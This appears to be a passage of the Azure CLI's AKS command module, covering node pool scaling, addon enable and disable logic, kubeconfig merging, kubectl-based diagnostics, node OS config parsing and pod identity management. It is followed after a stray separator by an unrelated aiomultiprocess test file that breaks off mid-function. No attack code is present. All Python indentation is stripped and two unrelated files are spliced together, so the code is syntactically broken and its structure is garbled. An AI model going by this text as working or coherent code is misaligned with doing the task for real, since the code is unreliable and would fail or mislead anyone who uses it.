instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, disable_sgxquotehelper=False, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
disable_sgxquotehelper=disable_sgxquotehelper, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
disable_sgxquotehelper=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "true"})
if disable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "false"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
else:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = monitoring_addon_enabled or ingress_appgw_addon_enabled or (enable_managed_identity and attach_acr)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError("Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get("cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get("cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get("imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get("imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get("topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get("allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
return config_object
def _get_linux_os_config(file_path):
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError("Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get("transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get("transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError("Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get("netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get("netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get("netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get("netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get("netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get("netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get("netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get("netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get("netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get("netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get("netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get("netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get("netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get("netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get("netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get("netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get("netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get("netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get("netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get("netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get("fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get("kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get("vmVfsCachePressure", None)
return config_object
def _ensure_pod_identity_addon_is_enabled(instance):
addon_enabled = False
if instance and instance.pod_identity_profile:
addon_enabled = instance.pod_identity_profile.enabled
if not addon_enabled:
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None):
if not enable:
# when disable, null out the profile
instance.pod_identity_profile = None
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=True,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
return
instance.pod_identity_profile.enabled = True
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
managed_identity_operator_role = 'Managed Identity Operator'
managed_identity_operator_role_id = 'f1a07417-d97a-45cb-824c-7a7467783830'
cluster_identity_object_id = None
if instance.identity.type.lower() == 'userassigned':
for identity in instance.identity.user_assigned_identities.values():
cluster_identity_object_id = identity.principal_id
break
elif instance.identity.type.lower() == 'systemassigned':
cluster_identity_object_id = instance.identity.principal_id
else:
raise CLIError('unsupported identity type: {}'.format(instance.identity.type))
if cluster_identity_object_id is None:
raise CLIError('unable to resolve cluster identity')
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(managed_identity_operator_role_id):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, managed_identity_operator_role, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission for cluster')
# need more time to propogate this assignment...
print()
print('Wait 30 seconds for identity role assignment propagation.')
time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError('pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
|
core.py | # Copyright 2018 John Reese
# Licensed under the MIT license
import asyncio
import os
from unittest import TestCase
import aiomultiprocess as amp
from aiomultiprocess.core import context, PoolWorker
from .base import async_test
async def mapper(value):
return value * 2
async def starmapper(*values):
return [value * 2 for value in values]
class CoreTest(TestCase):
@async_test
async def test_process(self):
async def sleepy():
await asyncio.sleep(0.1)
p = amp.Process(target=sleepy, name="test_process")
p.start()
self.assertEqual(p.name, "test_process")
self.assertTrue(p.pid)
self.assertTrue(p.is_alive())
await p.join()
self.assertFalse(p.is_alive())
@async_test
async def test_process_timeout(self):
async def sleepy():
await asyncio.sleep(1)
p = amp.Process(target=sleepy)
p.start()
with self.assertRaises(asyncio.TimeoutError):
await p.join(timeout=0.01)
@async_test
async def test_worker(self):
async def sleepypid():
await asyncio.sleep(0.1)
